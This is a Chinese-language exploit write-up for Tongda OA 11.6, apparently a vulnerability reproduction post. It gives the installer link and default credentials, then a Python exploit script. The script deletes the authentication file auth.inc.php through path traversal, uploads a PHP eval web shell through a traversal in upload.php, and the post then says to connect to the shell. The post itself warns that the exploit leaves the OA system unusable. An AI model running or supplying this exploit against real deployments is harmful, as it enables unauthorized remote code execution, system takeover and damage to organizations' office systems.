本片文章僅用於教學請不要用於非法用途

漏洞影響版本

TDOA11.6

漏洞環境

TDOA11.6

復現

本片EXP復現存在風險，使用後會造成OA系統無法使用

安裝

安裝包：https://cdndown.tongda2000.com/oa/2019/TDOA11.6.exe

一直下一步傻瓜式安裝即可

使用者名稱：admin 密碼：空

登入後截圖

EXP

import requests
target="url"  # 修改url引數
payload="<?php eval($_POST['3838']);?>"  # 一句話木馬
print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA
 
")
input("Press enter to continue")
print("[*]Deleting auth.inc.php....")


url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
requests.get(url=url)
print("[*]Checking if file deleted...")
url=target+"/inc/auth.inc.php"
page=requests.get(url=url).text
if 'No input file specified.
 
' not in page:
    print("[-]Failed to deleted auth.inc.php")
    exit(-1)
print("[+]Successfully deleted auth.inc.php!")
print("[*]Uploading payload...")
url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('dadada.php
 
', payload)}
requests.post(url=url,files=files)
url=target+"/_dadada.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[+]Filed Uploaded Successfully")
    print("[+]URL:",url)
else:
    print("[-]Failed to upload file")

本片EXP復現存在風險，使用後會造成OA系統無法使用

python td.py

連結shell